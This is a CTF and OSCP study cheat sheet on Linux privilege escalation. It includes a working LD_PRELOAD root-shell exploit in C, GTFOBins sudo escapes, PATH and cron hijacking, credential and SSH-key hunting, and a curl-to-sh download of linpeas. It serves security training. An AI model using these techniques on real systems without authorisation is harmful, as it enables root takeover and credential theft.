OSCP Survival Guide 2025: The Ultimate Linux Privilege Escalation Cheat Sheet

Por

You have done the hard part. You found the vulnerability, you exploited the web application, and you caught the reverse shell. You type whoami.

The terminal stares back at you: www-data.

In the world of the OSCP (Offensive Security Certified Professional) exam and high-level CTFs like Hack The Dome or Hack The Box, getting user access is only half the battle. The real prize—and the points that often decide whether you pass or fail—lies in the /root/root.txt file.

Linux Privilege Escalation (PrivEsc) is often the bottleneck for students. It can feel like searching for a needle in a haystack of configuration files. But here is the secret: it is not random. Privilege escalation is a systematic process of enumeration.

In this guide, I have compiled the exact workflow and command cheat sheet I use during my CTF write-ups and penetration tests. This is not just a list of tools; it is a methodology designed to keep you focused when the clock is ticking.

The Golden Rule: Enumeration Before Exploitation

Before you download a kernel exploit that might crash your target machine (and force you to restart your exam environment), you must enumerate manually. Automated tools like LinPEAS are great, but relying on them blindly makes you a script kiddie. Understanding the output is what makes you a hacker.

Here is the checklist we will cover:

  1. System & Kernel Information
  2. Sudo Rights (The #1 Vector)
  3. SUID/SGID Binaries
  4. Cron Jobs & Timers
  5. Passwords & Keys in Files
  6. Internal Ports & Network
  7. Kernel Exploits (The Last Resort)

1. System & Kernel Information

The moment you land a shell, you need to know where you are. Is this an ancient Ubuntu server or a hardened CentOS box?

The Commands

# Basic System Info<br>hostname<br>uname -a<br>cat /etc/issue<br>cat /etc/*-release<br><br># Kernel Version (Crucial for DirtyCow, DirtyPipe, etc.)<br>uname -r<br><br># Architecture<br>arch<br>

Why this matters: If you see a kernel version like 3.13, your eyes should light up. That is prime territory for DirtyCow. If you see a version from early 2022, you might be looking at DirtyPipe (CVE-2022-0847). Always cross-reference the output of uname -r with searchsploit or Google.

2. Sudo Rights: The “Low Hanging Fruit”

This is the very first thing you should check after basic system info. Often, administrators allow specific users to run specific commands as root for maintenance purposes. If they configure this poorly, it is game over.

The Magic Command

sudo -l<br>

If the terminal asks for a password and you don’t have one, move on. But if you managed to phish a user password or found one in a config file, this command reveals your permissions.

What to look for:

  • (ALL : ALL) ALL: You can run anything as root. Just type sudo su.
  • (root) NOPASSWD: /usr/bin/python: You can run Python as root without a password.

The GTFOBins Technique

If sudo -l shows you can run a binary like vim, less, find, or nmap, do not guess how to exploit it. Go immediately to GTFOBins (Google it).

For example, if you can run vim as sudo:

sudo vim -c ':!/bin/sh'<br>

This drops you into a root shell immediately.

The LD_PRELOAD Trick

Sometimes you will see this in the sudo -l output: env_keep+=LD_PRELOAD

This is a guaranteed win. It allows you to load a custom shared library before the program executes. You can compile a simple C script that spawns a shell and force sudo to run it.

Exploit:

  1. Create a file shell.c:C#include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); }
  2. Compile it: gcc -fPIC -shared -o shell.so shell.c -nostartfiles
  3. Run it: sudo LD_PRELOAD=/tmp/shell.so apache2 (or whatever allowed binary).

3. SUID/SGID Binaries: The Silent Killers

SUID (Set owner User ID upon execution) is a permission bit that allows a user to execute a file with the permissions of the file owner. If the owner is root, the program runs as root.

Finding SUID Files

You need to search the entire filesystem for files with the “s” bit set.

find / -perm -u=s -type f 2>/dev/null<br>
  • find /: Search the whole drive.
  • -perm -u=s: Look for SUID bit.
  • -type f: Only look for files.
  • 2>/dev/null: Hide all the “Permission Denied” errors so your screen stays clean.

Analyzing the Output: Ignore the standard ones like ping, su, mount, or passwd. Look for anomalies:

  • /usr/bin/find
  • /usr/bin/cp
  • /usr/bin/systemctl
  • /opt/custom_script

If you find /usr/bin/cp with SUID, you can copy /etc/passwd to /tmp/, add a root user manually, and copy it back to overwrite the original file.

Finding Capabilities (The Modern SUID)

Newer Linux systems use “Capabilities” to manage privileges more granularly. These are often overlooked.

getcap -r / 2>/dev/null<br>

If you see /usr/bin/python3.8 = cap_setuid+ep, you can manipulate your UID to become 0 (root) within a Python script.

4. Cron Jobs & Path Hijacking

Linux systems run background tasks via Cron. If these tasks run as root and are insecure, you can hijack them.

Passive Enumeration (pspy)

You cannot always see root’s crontab with crontab -l. You need to watch the processes. In my CTF write-ups, I always recommend uploading pspy64. This tool monitors the Linux process list in real-time without needing root access.

Run ./pspy64 and wait 5 minutes. Look for:

  1. Scripts running every minute (UID=0).
  2. Are those scripts writable by you? (ls -la /path/to/script.sh)
  3. Are they using relative paths?

The Relative Path Exploit: If root runs a script that contains: tar -czf backup.tar.gz /var/www/html

Notice it says tar, not /usr/bin/tar. This is a vulnerability.

  1. Navigate to a folder you control (like /tmp).
  2. Create a malicious file named tar that spawns a shell.
  3. Add /tmp to your PATH: export PATH=/tmp:$PATH
  4. Wait for the cron job to run. The system will look in /tmp first, find your fake tar, execute it as root, and give you a shell.

5. Passwords, Keys, and History

Users are human. Humans are lazy. They reuse passwords and leave them in cleartext.

The Bash History

Always check the history files. Users often type passwords into the command line by mistake (e.g., mysql -u root -pPassword123).

cat ~/.bash_history
cat /home/*/.bash_history<br>

Config Files

Web applications need to connect to databases. Those credentials are usually in a config file.

grep -r "password" /var/www/ 2>/dev/null
grep -r "DB_PASS" /var/www/ 2>/dev/null
cat /var/www/html/wp-config.php  # WordPress
cat /var/www/html/configuration.php # Joomla<br>

If you find a database password, TRY IT EVERYWHERE.

  • Try to SSH with it.
  • Try su root with it.
  • Try other users on the box.

SSH Keys

Sometimes you get lucky and find a private key backup.

find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null<br>

If you find an id_rsa file that is world-readable, copy it to your machine, fix permissions (chmod 600 id_rsa), and try to SSH in as that user.

6. Internal Ports (Tunneling)

Sometimes a service is running as root but is only listening on 127.0.0.1 (localhost). You can’t see it from the outside, but you can see it now.

netstat -antup
ss -antup<br>

Look for ports like 3306 (MySQL), 6379 (Redis), or 8080 (Internal Jenkins/Tomcat). If you find an internal Jenkins server running as root with no authentication, you can use SSH Tunneling (Port Forwarding) to access it from your browser and execute code via the Groovy script console.

7. Automated Tools: The “Lazy” Way

I put this last for a reason. In the OSCP exam, you are limited in how many tools you can use, and sometimes they generate too much noise. However, they are invaluable for a final sweep.

  • LinPEAS: The absolute king of enumeration scripts. It highlights vulnerabilities in Red/Yellow.
    • curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
  • LinEnum: A classic, solid alternative.
  • LSE (Linux Smart Enumeration): Great for a quick check.

Pro Tip: Always save the output to a file so you can grep through it later. ./linpeas.sh > linpeas_output.txt

Conclusion: The Mindset of a Root User

Privilege escalation is not about memorizing 1,000 commands. It is about understanding how Linux permissions work and finding the one place where the administrator made a mistake.

When you are stuck in a CTF or the exam:

  1. Don’t Panic.
  2. Re-enumerate. Did you check /opt? Did you check /var/backups?
  3. Read the Code. If there is a custom script running, read it line by line. The vulnerability is often a logic error, not a CVE.

If you are looking to practice these techniques, I highly recommend checking out the “PrivEsc” specific rooms on TryHackMe or revisiting the retired machines on Hack The Dome.

Keep this cheat sheet bookmarked. You will need it.

Good luck, and happy hacking.

Found this guide helpful? Check out my other write-ups where I demonstrate these techniques on live machines like “Hack The Dome – Web Edition”.